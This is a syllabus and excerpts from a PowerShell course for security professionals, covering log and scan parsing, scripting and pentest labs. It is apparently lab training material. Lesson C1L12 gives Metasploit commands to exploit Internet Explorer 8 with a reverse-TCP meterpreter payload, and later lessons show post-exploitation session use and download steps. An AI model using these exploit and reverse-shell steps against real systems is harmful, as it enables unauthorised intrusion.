PowerShell For InfoSec Professionals


The simple fact is that if you are going to be attacking or defending modern environments with newer operating systems (Windows 10, Server 2016), you need PowerShell!

There is no getting around it, and the sooner you drink the PowerShell Kool-Aid, the better InfoSec professional you will be.


  • Simple programming fundamentals
  • Cmdlets
  • Variables
  • WMI Objects

Security tasks with PowerShell:

  • PowerShell Tool Development
  • PCAP Parsing and Sniffing
  • Malware Analysis

Pentesting tasks:

  • Ping Sweeping
  • Port Scanning
  • Enumerating Hosts/Networks
  • Download & Execute
  • Parsing Nmap scans
  • Parsing Nessus scans

Tool development:

  • Programming logic for security tasks
  • Tool structure
  • ...and of course, integrating with Metasploit and other security tools

Course By

Joseph McCray


C1L1: PowerShell Basics

Author: Joseph McCray

Introduction: In this lesson, we will see and use some basic commands in the PowerShell console. We also have videos that will help you, and after this lesson is finished, you can use the PowerShell console to move from one folder to another, see what it contains and other things.

Learning Objectives: Get to know [...]

C1L2: Simple Event Log Analysis

Author: Joseph McCray

Introduction: Event logs provide information about applications and can be handled with cmdlets whose parameters help to dump these events into specific variables or simply to identify specific dates within system records.

Learning Objectives: describe simple event log analysis techniques; review PowerShell scripts to manage event logs; analyze event log characteristics.

Step 1: Dump [...]

C1L3: Simple Log File Analysis

Author: Joseph McCray

Introduction: Log file analysis is an important task that allows us to get critical information about a service, an application or a system. When we need to examine or research a target, it is highly recommended to dig into the log files because all the configurations, events, errors, warnings and notices from a given [...]

C1L4: Parsing Log Files Using Windows PowerShell

Author: Joseph McCray

PARSING LOG FILES

Download the sample IIS log http://pastebin.com/LBn64cyA

    (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")

    Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV")}

The above command would give us all the WebDAV requests. To filter this to a particular username, use the below command:

    Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "OPTIONS")}

[...]

C1L7: Pentester Tasks

Author: Joseph McCray

Introduction: In this lesson, we will learn to ping with PowerShell. We will also perform a scan similar to Nmap's and see several scripts to perform port scanning.

Learning Objectives: perform a scan in a local network; perform a port scan.

Listing IPs: One of the typical ways for working with IP addresses [...]

C1L8: Parsing Nmap XML Files

Author: Joseph McCray

PARSING NMAP XML FILES

If you are NOT using the Win7 VM provided, you can get the required files for this lab from this zip file: https://s3.amazonaws.com/infosecaddicts-files/PowerShell-Files.zip

Run PowerShell as administrator

    cd C:\
    Get-ExecutionPolicy
    Set-ExecutionPolicy Unrestricted -Force

Parse nmap XML

    .\parse-nmap.ps1 samplescan.xml

Process all XML files

    .\parse-nmap.ps1 *.xml

Piping also works [...]

C1L9: Parsing Nessus scans with PowerShell

Author: Joseph McCray

Introduction: Nessus scans different types of systems for vulnerabilities. The report of a scan can be obtained in different formats, CSV being the most used. We will see how some PowerShell cmdlets allow us to parse a CSV file to obtain specific details, customize formats and more. In the next lesson, we will see [...]

C1L11: Introduction to scripting and toolmaking

Author: Joseph McCray

Start the ISE

    CTRL+R

    Get-EventLog -LogName application

Now run the script

    .\GrabLogs.ps1

    $LogName="application"
    Get-EventLog -LogName $LogName | Export-Clixml C:\Users\Workshop\Desktop\Scripts\$LogName.xml

Now run the script

    .\GrabLogs.ps1

    param(
        $LogName="application"
    )
    Get-EventLog -LogName $LogName | Export-Clixml C:\Users\Workshop\Desktop\Scripts\$LogName.xml

Now run the script

    .\GrabLogs.ps1

Now run the script

    .\GrabLogs.ps1 -L[ TAB Key ]
    .\GrabLogs.ps1 -LogName (you [...]

C1L12: Attacking Windows 7

Author: Joseph McCray

ATTACKING WINDOWS 7

NOTE: You'll be using your Ubuntu Linux host as the attacker machine in this lab

    sudo /sbin/iptables -F infosecaddicts
    cd ~/toolz/metasploit
    ./msfconsole
    use exploit/windows/browser/ie_cgenericelement_uaf
    set ExitOnSession false
    set URIPATH /ie8
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST InfoSecAddictsVM
    exploit -j

Now from the Win7 host, use Internet Explorer 8 to connect to the exploit [...]

C1L13: Client-Side Enumeration

Author: Joseph McCray

CLIENT SIDE ENUMERATION

You can list the active sessions by typing:

    sessions -l

You can "interact" with any active session by typing sessions -i 3 (replace 3 with the session number you want to interact with)

    sessions -i 1

You should now see Metasploit's meterpreter prompt.

Figure out who and where you are

    meterpreter> sysinfo

[...]

C1L14: Running PowerShell From A Command Prompt

Author: Joseph McCray

Using Powersploit & Nishang

The following lesson will show how we can use PowerShell commands from the command prompt in Windows.

COMMAND & 1 PARAMETER SYNTAX:

    powershell -command "& {&'some-command' someParam}"

MULTIPLE COMMAND & PARAMETER SYNTAX:

    powershell -command "& {&'some-command' someParam}"; "& {&'some-command' -SpecificArg someParam}"

Simple Ping Sweep

    powershell -command "100..150 | % {\""192.168.0.$($_): $(Test-Connection [...]